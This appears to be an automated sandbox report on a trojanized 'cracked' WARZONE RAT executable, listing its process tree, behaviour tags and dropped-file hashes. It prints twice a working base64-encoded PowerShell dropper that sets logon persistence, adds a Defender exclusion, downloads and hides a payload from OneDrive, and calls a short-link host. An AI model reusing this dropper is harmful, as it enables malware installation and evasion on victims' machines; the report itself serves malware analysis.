C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2164,12963522789292377245,2407174719499987538,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.4355 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=6212 /prefetch:23⤵
- Suspicious behavior: EnumeratesProcesses
PID:3544
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2164,12963522789292377245,2407174719499987538,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4932 /prefetch:13⤵PID:4616
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2164,12963522789292377245,2407174719499987538,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4760 /prefetch:13⤵PID:2776
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2164,12963522789292377245,2407174719499987538,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7244 /prefetch:13⤵PID:1704
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2164,12963522789292377245,2407174719499987538,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=24 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4944 /prefetch:13⤵PID:2120
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2164,12963522789292377245,2407174719499987538,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=25 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3092 /prefetch:13⤵PID:4528
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2164,12963522789292377245,2407174719499987538,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=26 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7100 /prefetch:13⤵PID:3548
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2164,12963522789292377245,2407174719499987538,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=27 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4768 /prefetch:13⤵PID:3660
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2164,12963522789292377245,2407174719499987538,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=28 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=936 /prefetch:13⤵PID:2060
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2164,12963522789292377245,2407174719499987538,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=29 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7432 /prefetch:13⤵PID:392
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2164,12963522789292377245,2407174719499987538,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=30 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6056 /prefetch:13⤵PID:4576
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2164,12963522789292377245,2407174719499987538,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=31 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3692 /prefetch:13⤵PID:1096
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2164,12963522789292377245,2407174719499987538,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=32 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7716 /prefetch:13⤵PID:2000
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2164,12963522789292377245,2407174719499987538,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=33 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7760 /prefetch:13⤵PID:3844
-
-
-
C:\Program Files\7-Zip\7zG.exe"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\WARZONERAT3.03\" -spe -an -ai#7zMap8153:90:7zEvent242302⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:4356
-
-
C:\Windows\system32\NOTEPAD.EXE"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Downloads\WARZONERAT3.03\PASSWORD.txt2⤵
- Opens file in notepad (likely ransom note)
PID:4344
-
-
C:\Program Files\7-Zip\7zG.exe"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\WARZONERAT3.03\" -an -ai#7zMap25593:122:7zEvent319542⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:2480
-
-
C:\Users\Admin\Downloads\WARZONERAT3.03\WARZONE RAT 3.03\WARZONE-RAT 3.03 Cracked.exe"C:\Users\Admin\Downloads\WARZONERAT3.03\WARZONE RAT 3.03\WARZONE-RAT 3.03 Cracked.exe"2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Modifies registry class
PID:3864 -
C:\Users\Admin\Downloads\WARZONERAT3.03\WARZONE RAT 3.03\WARZONE RAT 3.03 Cracked.exe"C:\Users\Admin\Downloads\WARZONERAT3.03\WARZONE RAT 3.03\WARZONE RAT 3.03 Cracked.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Loads dropped DLL
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:3596
-
-
-
C:\Users\Admin\Downloads\WARZONERAT3.03\WARZONE RAT 3.03\WARZONE-RAT 3.03 Cracked.exe"C:\Users\Admin\Downloads\WARZONERAT3.03\WARZONE RAT 3.03\WARZONE-RAT 3.03 Cracked.exe"2⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
PID:5104 -
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\8F75.tmp\8F76.bat "C:\Users\Admin\Downloads\WARZONERAT3.03\WARZONE RAT 3.03\WARZONE-RAT 3.03 Cracked.exe""3⤵PID:1296
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -e JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAnAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAJwANAAoAJABhAGMAdABpAG8AbgAgAD0AIABOAGUAdwAtAFMAYwBoAGUAZAB1AGwAZQBkAFQAYQBzAGsAQQBjAHQAaQBvAG4AIAAtAEUAeABlAGMAdQB0AGUAIAAkAGUAbgB2ADoAcAByAG8AZwByAGEAbQBkAGEAdABhAFwAbQBpAGMAcgBvAHMAbwBmAHQAXABNAGEAaQBuAHQAZQBuAGEAbgBjAGUALgBlAHgAZQANAAoAJAB0AHIAaQBnAGcAZQByACAAPQAgAE4AZQB3AC0AUwBjAGgAZQBkAHUAbABlAGQAVABhAHMAawBUAHIAaQBnAGcAZQByACAALQBBAHQATABvAGcAbwBuACAADQAKACQAdABhAHMAawBwAGEAdABoACAAPQAgACIATQBhAGkAbgB0AGUAbgBhAG4AYwBlACAAUwBlAHQAdABpAG4AZwBzACAAQwBvAG4AdAByAG8AbAAgAFAAYQBuAGUAbAAiAA0ACgBSAGUAZwBpAHMAdABlAHIALQBTAGMAaABlAGQAdQBsAGUAZABUAGEAcwBrACAALQBBAGMAdABpAG8AbgAgACQAYQBjAHQAaQBvAG4AIAAtAFQAcgBpAGcAZwBlAHIAIAAkAHQAcgBpAGcAZwBlAHIAIAAtAFQAYQBzAGsATgBhAG0AZQAgACIATQBhAGkAbgB0AGUAbgBhAG4AYwBlACAAUwBlAHQAdABpAG4AZwBzACAAQwBvAG4AdAByAG8AbAAgAFAAYQBuAGUAbAAiACAALQBUAGEAcwBrAFAAYQB0AGgAIAAkAHQAYQBzAGsAcABhAHQAaAAgAC0ARgBvAHIAYwBlAA0ACgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAJABlAG4AdgA6AHAAcgBvAGcAcgBhAG0AZABhAHQAYQBcAG0AaQBjAHIAbwBzAG8AZgB0AFwATQBhAGkAbgB0AGUAbgBhAG4AYwBlAC4AZQB4AGUAIAAtAEYAbwByAGMAZQANAAoAUwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBzACAANAANAAoAJABzAG8AdQByAGMAZQAgAD0AIAAiAGgAdAB0AHAAcwA6AC8ALwBvAG4AZQBkAHIAaQB2AGUALgBsAGkAdgBlAC4AYwBvAG0ALwBkAG8AdwBuAGwAbwBhAGQAPwBjAGkAZAA9AEMANwBGADAANQAwAEEAQgBBADYARAAwAEYANgBCADcAJgByAGUAcwBpAGQAPQBDADcARgAwADUAMABBAEIAQQA2AEQAMABGADYAQgA3ACUAMgAxADEAMAA1ACYAYQB1AHQAaABrAGUAeQA9AEEASQBQAFkAYQBtAHMAZAAzADgAYwBsAEYAVgBzACIADQAKACQAZABlAHMAdAAgAD0AIAAiACQAZQBuAHYAOgBwAHIAbwBnAHIAYQBtAGQAYQB0AGEAXABtAGkAYwByAG8AcwBvAGYAdABcAE0AYQBpAG4AdABlAG4AYQBuAGMAZQAuAGUAeABlACIAIAANAAoASQBuAHYAbwBrAGUALQBXAGUAYgBSAGUAcQB1AGUAcwB0ACAALQBVAHIAaQAgACQAcwBvAHUAcgBjAGUAIAAtAE8AdQB0AEYAaQBsAGUAIAAkAGQAZQBzAHQADQAKACQARgBJAEwARQA9AEcAZQB0AC0ASQB0AGUAbQAgACQAZQBuAHYAOgBwAHIAbwBnAHIAYQBtAGQAYQB0AGEAXABtAGkAYwByAG8AcwBvAGYAdABcAE0AYQBpAG4AdABlAG4AYQBuAGMAZQAuAGUAeABlACAALQBGAG8AcgBjAGUADQAKACQARgBJAEwARQAuAGEAdAB0AHIAaQBiAHUAdABlAHMAPQAnAFIAZQBhAGQATwBuAGwAeQAnACwAJwBIAGkAZABkAGUAbgAnACwAJwBTAHkAcwB0AGUAbQAnAA0ACgAkAEEAYwBsACAAPQAgAEcAZQB0AC0AQQBjAGwAIAAiACQAZQBuAHYAOgBwAHIAbwBnAHIAYQBtAGQAYQB0AGEAXABtAGkAYwByAG8AcwBvAGYAdABcAE0AYQBpAG4AdABlAG4AYQBuAGMAZQAuAGUAeABlACIADQAKACQAQQByACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAgAHMAeQBzAHQAZQBtAC4AcwBlAGMAdQByAGkAdAB5AC4AYQBjAGMAZQBzAHMAYwBvAG4AdAByAG8AbAAuAGYAaQBsAGUAcwB5AHMAdABlAG0AYQBjAGMAZQBzAHMAcgB1AGwAZQAoACIARQB2AGUAcgB5AG8AbgBlACIALAAiAFcAcgBpAHQAZQAiACwAIgBEAGUAbgB5ACIAKQANAAoAJABBAGMAbAAuAFMAZQB0AEEAYwBjAGUAcwBzAFIAdQBsAGUAKAAkAEEAcgApAA0ACgBTAGUAdAAtAEEAYwBsACAAIgAkAGUAbgB2ADoAcAByAG8AZwByAGEAbQBkAGEAdABhAFwAbQBpAGMAcgBvAHMAbwBmAHQAXABNAGEAaQBuAHQAZQBuAGEAbgBjAGUALgBlAHgAZQAiACAAJABBAGMAbAANAAoAcwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgACQAZQBuAHYAOgBwAHIAbwBnAHIAYQBtAGQAYQB0AGEAXABtAGkAYwByAG8AcwBvAGYAdABcAE0AYQBpAG4AdABlAG4AYQBuAGMAZQAuAGUAeABlAA0ACgB3AGcAZQB0ACAAaAB0AHQAcABzADoALwAvAHkAaQBwAC4AcwB1AC8AMgBBAGQAMgBSADcADQAKAFsARQBuAHYAaQByAG8AbgBtAGUAbgB0AF0AOgA6AEUAeABpAHQAKAAxACkAIAA=4⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3264
-
-
-
-
C:\Users\Admin\Downloads\WARZONERAT3.03\WARZONE RAT 3.03\WARZONE-RAT 3.03 Cracked.exe"C:\Users\Admin\Downloads\WARZONERAT3.03\WARZONE RAT 3.03\WARZONE-RAT 3.03 Cracked.exe"2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
PID:2536
-
-
C:\Users\Admin\Downloads\WARZONERAT3.03\WARZONE RAT 3.03\WARZONE-RAT 3.03 Cracked.exe"C:\Users\Admin\Downloads\WARZONERAT3.03\WARZONE RAT 3.03\WARZONE-RAT 3.03 Cracked.exe"2⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
PID:1264 -
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\7744.tmp\7745.bat "C:\Users\Admin\Downloads\WARZONERAT3.03\WARZONE RAT 3.03\WARZONE-RAT 3.03 Cracked.exe""3⤵PID:1968
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -e JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAnAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAJwANAAoAJABhAGMAdABpAG8AbgAgAD0AIABOAGUAdwAtAFMAYwBoAGUAZAB1AGwAZQBkAFQAYQBzAGsAQQBjAHQAaQBvAG4AIAAtAEUAeABlAGMAdQB0AGUAIAAkAGUAbgB2ADoAcAByAG8AZwByAGEAbQBkAGEAdABhAFwAbQBpAGMAcgBvAHMAbwBmAHQAXABNAGEAaQBuAHQAZQBuAGEAbgBjAGUALgBlAHgAZQANAAoAJAB0AHIAaQBnAGcAZQByACAAPQAgAE4AZQB3AC0AUwBjAGgAZQBkAHUAbABlAGQAVABhAHMAawBUAHIAaQBnAGcAZQByACAALQBBAHQATABvAGcAbwBuACAADQAKACQAdABhAHMAawBwAGEAdABoACAAPQAgACIATQBhAGkAbgB0AGUAbgBhAG4AYwBlACAAUwBlAHQAdABpAG4AZwBzACAAQwBvAG4AdAByAG8AbAAgAFAAYQBuAGUAbAAiAA0ACgBSAGUAZwBpAHMAdABlAHIALQBTAGMAaABlAGQAdQBsAGUAZABUAGEAcwBrACAALQBBAGMAdABpAG8AbgAgACQAYQBjAHQAaQBvAG4AIAAtAFQAcgBpAGcAZwBlAHIAIAAkAHQAcgBpAGcAZwBlAHIAIAAtAFQAYQBzAGsATgBhAG0AZQAgACIATQBhAGkAbgB0AGUAbgBhAG4AYwBlACAAUwBlAHQAdABpAG4AZwBzACAAQwBvAG4AdAByAG8AbAAgAFAAYQBuAGUAbAAiACAALQBUAGEAcwBrAFAAYQB0AGgAIAAkAHQAYQBzAGsAcABhAHQAaAAgAC0ARgBvAHIAYwBlAA0ACgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAJABlAG4AdgA6AHAAcgBvAGcAcgBhAG0AZABhAHQAYQBcAG0AaQBjAHIAbwBzAG8AZgB0AFwATQBhAGkAbgB0AGUAbgBhAG4AYwBlAC4AZQB4AGUAIAAtAEYAbwByAGMAZQANAAoAUwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBzACAANAANAAoAJABzAG8AdQByAGMAZQAgAD0AIAAiAGgAdAB0AHAAcwA6AC8ALwBvAG4AZQBkAHIAaQB2AGUALgBsAGkAdgBlAC4AYwBvAG0ALwBkAG8AdwBuAGwAbwBhAGQAPwBjAGkAZAA9AEMANwBGADAANQAwAEEAQgBBADYARAAwAEYANgBCADcAJgByAGUAcwBpAGQAPQBDADcARgAwADUAMABBAEIAQQA2AEQAMABGADYAQgA3ACUAMgAxADEAMAA1ACYAYQB1AHQAaABrAGUAeQA9AEEASQBQAFkAYQBtAHMAZAAzADgAYwBsAEYAVgBzACIADQAKACQAZABlAHMAdAAgAD0AIAAiACQAZQBuAHYAOgBwAHIAbwBnAHIAYQBtAGQAYQB0AGEAXABtAGkAYwByAG8AcwBvAGYAdABcAE0AYQBpAG4AdABlAG4AYQBuAGMAZQAuAGUAeABlACIAIAANAAoASQBuAHYAbwBrAGUALQBXAGUAYgBSAGUAcQB1AGUAcwB0ACAALQBVAHIAaQAgACQAcwBvAHUAcgBjAGUAIAAtAE8AdQB0AEYAaQBsAGUAIAAkAGQAZQBzAHQADQAKACQARgBJAEwARQA9AEcAZQB0AC0ASQB0AGUAbQAgACQAZQBuAHYAOgBwAHIAbwBnAHIAYQBtAGQAYQB0AGEAXABtAGkAYwByAG8AcwBvAGYAdABcAE0AYQBpAG4AdABlAG4AYQBuAGMAZQAuAGUAeABlACAALQBGAG8AcgBjAGUADQAKACQARgBJAEwARQAuAGEAdAB0AHIAaQBiAHUAdABlAHMAPQAnAFIAZQBhAGQATwBuAGwAeQAnACwAJwBIAGkAZABkAGUAbgAnACwAJwBTAHkAcwB0AGUAbQAnAA0ACgAkAEEAYwBsACAAPQAgAEcAZQB0AC0AQQBjAGwAIAAiACQAZQBuAHYAOgBwAHIAbwBnAHIAYQBtAGQAYQB0AGEAXABtAGkAYwByAG8AcwBvAGYAdABcAE0AYQBpAG4AdABlAG4AYQBuAGMAZQAuAGUAeABlACIADQAKACQAQQByACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAgAHMAeQBzAHQAZQBtAC4AcwBlAGMAdQByAGkAdAB5AC4AYQBjAGMAZQBzAHMAYwBvAG4AdAByAG8AbAAuAGYAaQBsAGUAcwB5AHMAdABlAG0AYQBjAGMAZQBzAHMAcgB1AGwAZQAoACIARQB2AGUAcgB5AG8AbgBlACIALAAiAFcAcgBpAHQAZQAiACwAIgBEAGUAbgB5ACIAKQANAAoAJABBAGMAbAAuAFMAZQB0AEEAYwBjAGUAcwBzAFIAdQBsAGUAKAAkAEEAcgApAA0ACgBTAGUAdAAtAEEAYwBsACAAIgAkAGUAbgB2ADoAcAByAG8AZwByAGEAbQBkAGEAdABhAFwAbQBpAGMAcgBvAHMAbwBmAHQAXABNAGEAaQBuAHQAZQBuAGEAbgBjAGUALgBlAHgAZQAiACAAJABBAGMAbAANAAoAcwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgACQAZQBuAHYAOgBwAHIAbwBnAHIAYQBtAGQAYQB0AGEAXABtAGkAYwByAG8AcwBvAGYAdABcAE0AYQBpAG4AdABlAG4AYQBuAGMAZQAuAGUAeABlAA0ACgB3AGcAZQB0ACAAaAB0AHQAcABzADoALwAvAHkAaQBwAC4AcwB1AC8AMgBBAGQAMgBSADcADQAKAFsARQBuAHYAaQByAG8AbgBtAGUAbgB0AF0AOgA6AEUAeABpAHQAKAAxACkAIAA=4⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
PID:2076
-
-
-
-
C:\Windows\system32\taskmgr.exe"C:\Windows\system32\taskmgr.exe" /42⤵
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:3824
-
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:1884
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:2980
-
C:\Windows\system32\AUDIODG.EXEC:\Windows\system32\AUDIODG.EXE 0x510 0x4f41⤵
- Suspicious use of AdjustPrivilegeToken
PID:2896
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵PID:4444
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
859B
MD56ac788b37bd66f864d1c55570224421e
SHA1019a045033189b462ba360eb695f28432cad2031
SHA256fca59707e0e135a8bbe1281934e3af9b21147b29c0219cd3966d14e53b9d58d1
SHA51225ed770f024d957e7b01eb8acfe6f4e68127410ff3085a22ec85e4bd091ad8ac1a69e484d11a02bc3d0631b156945d5df32c1ded861fb9603f76533fd0b6b2dc
-
Filesize
3KB
MD5960717c9bbc5b8ff88c27fb2f6f04656
SHA1c70c3138c0433aeab64c8aeff67b3622ab1ba6f0
SHA256d590e995a7e689fbf387f3f917863a37460b99b32f8c0dcb9fb2389f3d8af5e8
SHA5129e86e38e4af549d5407c1a03b609747eeff66a76cddee9caeb7b94f606d879c2b5bd05d596d67437229cf5902fd840016c7d4e3b59047b1f3bd030efecb61ef9
-
Filesize
152B
MD58114c8477a121c9aa4f577ebe753f277
SHA1379db86efc023e0caf2cc4219edc6a7893bca450
SHA25690550a45ff1e8b1f718ffcda740d3701bde2c12ffa9b163ab712632134d1bd3a
SHA51276bfa7fe925a6965a95caf8a7cc33ca2e1360cc4ebb60209aa3beef668fbe2e7e8d083c9231319f79db0f9c86c131af0c302a176afd13262ca51db72528c4e55
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index
Filesize528B
MD555f6fbc6490266a883707b1d207b3ff0
SHA161d6abf2b5ce1217335d43acfc2ee68a8fb01d6a
SHA2564a81d260a3bd5d6f2d43c35f52a2465ee8e14539684170731877beac51c78442
SHA51242b70e9610d7597820bb10e4842010b3d00094599ae3b6cddbcda2719f9ccfb75d55caab2c5000c4b954ba1c23befb126c8da1f4c6f26373c640ccea104be41e
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index
Filesize2KB
MD5425d2a360de59b3912f80160bb8c0c01
SHA1b658a26c36e2fa153435f81afc483da41d27fa2e
SHA256044872728783a1669f9a49f982bc4e47a2963d1837fa04fcae2ce0876c552d41
SHA512d320c26fd2cccd0dbd67fa20616524b1434968ed79fd971e77bbe6bd884181d44c5151fb0a3a753bbffd0f6f99b033e59f88c19dd5ce65e4a51e198909e71590
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index
Filesize240B
MD5959e55441b4a996c6592fc971ab8cf4a
SHA1934be8a7fb593c76d8289f40119fa8c25e4076ec
SHA256e55f7676d6a015909999e1c98ed7d3cd7230df281ad429c385c961ea648c5b2c
SHA512bc3d6fe113324bf2872e2c99e17754a9b1db19abe4db6aade5b98664380ddba853d3b11c99b1e7bfc98f92e2d6dab8128a9d1a9603efdada66bbf4a9e26e8731
-
Filesize
16B
MD546295cac801e5d4857d09837238a6394
SHA144e0fa1b517dbf802b18faf0785eeea6ac51594b
SHA2560f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443
SHA5128969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\IndexedDB\https_whatismyipaddress.com_0.indexeddb.leveldb\MANIFEST-000001
Filesize23B
MD53fd11ff447c1ee23538dc4d9724427a3
SHA11335e6f71cc4e3cf7025233523b4760f8893e9c9
SHA256720a78803b84cbcc8eb204d5cf8ea6ee2f693be0ab2124ddf2b81455de02a3ed
SHA51210a3bd3813014eb6f8c2993182e1fa382d745372f8921519e1d25f70d76f08640e84cb8d0b554ccd329a6b4e6de6872328650fefa91f98c3c0cfc204899ee824
-
Filesize
111B
MD5285252a2f6327d41eab203dc2f402c67
SHA1acedb7ba5fbc3ce914a8bf386a6f72ca7baa33c6
SHA2565dfc321417fc31359f23320ea68014ebfd793c5bbed55f77dab4180bbd4a2026
SHA51211ce7cb484fee66894e63c31db0d6b7ef66ad0327d4e7e2eb85f3bcc2e836a3a522c68d681e84542e471e54f765e091efe1ee4065641b0299b15613eb32dcc0d
-
Filesize
1KB
MD5ca7c4628e112239fbfebabccf7e772ef
SHA1e5cb9b3d625ffcbb7dd8a9103b08d8efc5542553
SHA2564929e63a533fe0ffb259ab6769372e8f68a91bdd459e17dcc6c931746a71e5ba
SHA512ada811f0000f9ff38be2d2339b5adba417ceb88e8499fbf784af713257865d8e68281ab9c4886985e0357e4614a73610ffb7aa6617621b42eacfbaf7e79da34e
-
Filesize
1KB
MD52a61c0e672eddc863c9136249161b229
SHA16ff3553eff622f8f713de5b90f39ad93e67c8235
SHA256aa1d7c0e324d7b490e2f678ce2d9c1d4c3e71de27d422cd3ee088d1aa312068c
SHA51247ce6bb35286bf2ff36e402fae06ba77ce498441e8139200a425ac21d8cb8d1a7b4d6b5688adb6c5144752b2b11c1b3c44531e2d1e8e6ce5fe4d27bf40ea7450
-
Filesize
6KB
MD54d8261aa360e8a09aefd17e13a756f9e
SHA1724195677bd1a0d1c8a8acfa452dc3c241f30290
SHA256d4ce4bcbdf2370a2ce255eea83f24822455453ac1015a81256a9201548383db1
SHA5129a31751026d6283e2d4f676387b70a4aa192c61f4761484a4276eabed7e6cb2dd3b8540c87d8691c06f7d08fe088f39da600cfa55e0ec68acd6c2397b44e1426
-
Filesize
6KB
MD521da8c8560942536f92957ef284db09c
SHA113deba0a9e5c444aa68c8bbab0185efa3b878e2a
SHA2560674128c59b6eb84c891aefdf256904989d360dcc7712656ee105129d06ef976
SHA512feeb6e956ae02da52d7e39806992edace73d8f9fe5c3414a81c6c5c48bbf3cbf6d5ef45c8db3b91bd877a0a5901f5ab91204684886c91ea22ef6c5a800dff83c
-
Filesize
8KB
MD59faa454752a3e8b3706cd4f48510c3cc
SHA1886ec339763040f57c7a0bc5fb7566d1cf07eb05
SHA25680f9fdcaf16a225f8e0aa915ee83472bfe412538e81e88a20d314b1028f85841
SHA51273026a1327fc685f79559f9013a95fd76cfb4484a9c9a25ea45b549e9f22b5acf24f9bf6b771e721d7b55cd3448f5a01957dcc30b4afbeed5552ed5ed76d2c74
-
Filesize
5KB
MD53b0912f3c1cdd90593d8432409894572
SHA1dbe0554866d358a3a6a0ef168c6d0bd7a11e7ce8
